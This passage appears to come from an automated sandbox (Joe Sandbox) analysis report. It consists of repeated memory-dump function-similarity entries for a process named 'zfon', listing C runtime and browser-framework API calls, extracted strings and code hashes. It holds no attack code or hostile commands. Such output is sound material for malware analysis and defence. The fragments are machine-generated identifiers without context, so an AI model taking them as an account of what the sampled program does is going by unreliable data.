                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID: back$forward$reload$scene
                                                                                                                                                                            • API String ID: 547729093-2287126960
                                                                                                                                                                            • Opcode ID: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction ID: e85b6b12072c7af494b4b91b4fbf9e048c9004a940c6d7032e105a8fe0b0d170
                                                                                                                                                                            • Opcode Fuzzy Hash: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D127B63B49A4685EF20EBB5C4543BCA3B2AF85B98F858431CE4D5BB99DF38D405C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$isspace$memcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4286874901-0
                                                                                                                                                                            • Opcode ID: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                                                                                            • Instruction ID: 4ab4f62d60f20c254631467b70403a6de766a046abbab67fd3a010bdbf1fb399
                                                                                                                                                                            • Opcode Fuzzy Hash: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                                                                                            • Instruction Fuzzy Hash: E1A1AF23B09A8381FF20AB71A4403BDA7B6AB45BD4F848135DE5E57B99DF3CE4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$mallocmemcpymemmove$cef_string_map_alloc
                                                                                                                                                                            • String ID: URL
                                                                                                                                                                            • API String ID: 719352336-1657866020
                                                                                                                                                                            • Opcode ID: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                                                                                            • Instruction ID: 28b51a4b5e3cb106ba07af750057e9e499433249ace7e112f177969785e0d61f
                                                                                                                                                                            • Opcode Fuzzy Hash: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                                                                                            • Instruction Fuzzy Hash: D9E19123B09B8289EF10EBB5D4503AC77B2EB45B98F444935DE5D2BB99DE38D019C350
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
• Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
Similarity
• API ID: Name::operator+$Replicator::operator[]
• String ID: `anonymous namespace'
• API String ID: 3863519203-3062148218
• Opcode ID: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
• Instruction ID: d7e18f57aa0666bb39c561e950e6e6540e7c12abe743d131e4669cf5c34d7ef8
• Opcode Fuzzy Hash: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
• Instruction Fuzzy Hash: A5E1C2BAA08B8299EB10CF34D8842EE77A0FB44784F616135EB4D67B55DF38E525CB00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$memset
• String ID: ://
• API String ID: 1954376288-1869659232
• Opcode ID: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
• Instruction ID: a8ec9f8aa2bf713933d0b48cdc6a1b39e83e5c4370fcc5da32a0bdd8818e713c
• Opcode Fuzzy Hash: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
• Instruction Fuzzy Hash: 98C17132A08A8695EF34EB75E8443A9A372FB84754F804435DA8D07BA9DF3CE595C321
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
• String ID: clear$writeCertHolder$writeUrl
• API String ID: 614388589-602964746
• Opcode ID: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
• Instruction ID: 90a3346c92dee146387a14bcbeac28c0a09c934f9097f0f4ce7978c5b2d3b258
• Opcode Fuzzy Hash: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
• Instruction Fuzzy Hash: 5DC1C363B09A4685EF20EB79D4503ADA372EB84B94F848931DE4E177A6DF2CD445C320
APIs
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FC2E
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FC82
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FCD2
• _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
• free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
• _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
• free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
• calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
  • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
  • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
  • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
• Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FD24
  • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
  • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
  • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
  • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
  • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
  • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
• Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FEAE
  • Part of subcall function 00007FFBC1B65920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6592F
Strings
• :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B5FD9E
• :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B5FE1C
• :AM:am:PM:pm, xrefs: 00007FFBC1B5FE68
Memory Dump Source
• Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
Similarity
• API ID: calloc$free$Concurrency::cancel_current_task$ExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func_lock_localesmallocmemcpystd::bad_alloc::bad_alloc
• String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
• API String ID: 1555941588-35662545
• Opcode ID: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
• Instruction ID: e9eae5d9078442affca81b04702a206c6afb2d4341a7f75340064d1fb986a92e
• Opcode Fuzzy Hash: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
• Instruction Fuzzy Hash: FEB1E3AAA09B8186EB118F31E90427AA7A1FB19FD0F186274DF5D27795DF3CE441CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: disable-extensions$disable-gpu$disable-gpu-compositing$disable-gpu-vsync$disable-pdf-extension$disable-surfaces$enable-smooth-scrolling$enable-system-flash
                                                                                                                                                                            • API String ID: 1576575606-2877818427
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1462992686-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                            • API String ID: 2331677841-2441609178
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$memcpy$mallocmemmove
                                                                                                                                                                            • String ID: eu-cookie-compliance-agreed
                                                                                                                                                                            • API String ID: 3488293272-1104903451
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$DscaleStofltStoxfltXp_addhXp_mulh
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3318484812-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulx$DscaleStofltStoxfltisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1532609390-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulxiswctype$DscaleStofltStoxflt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1993114911-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$DscaleStofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1561094175-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$StofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3077680349-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$StofltStoxfltXp_addhXp_mulh
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3654286868-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                                                                            • API String ID: 511923668-4289949731
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xbad_alloc@std@@memcpy
                                                                                                                                                                            • String ID: scene
                                                                                                                                                                            • API String ID: 1435337725-3648647130
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FEAE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B5FD9E
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B5FE1C
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B5FE68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: callocfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1633071956-35662545
                                                                                                                                                                            • Opcode ID: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                                                                                            • Instruction ID: 8caf72258eed377c64a604ac87a51ffa8267cb72a3f0dd5ee7026ce659032962
                                                                                                                                                                            • Opcode Fuzzy Hash: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                                                                                            • Instruction Fuzzy Hash: F641A1AAB05B8185EB118F31D90876AB7A1BB18FD0F486178DE5D1738ADF3CE445CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
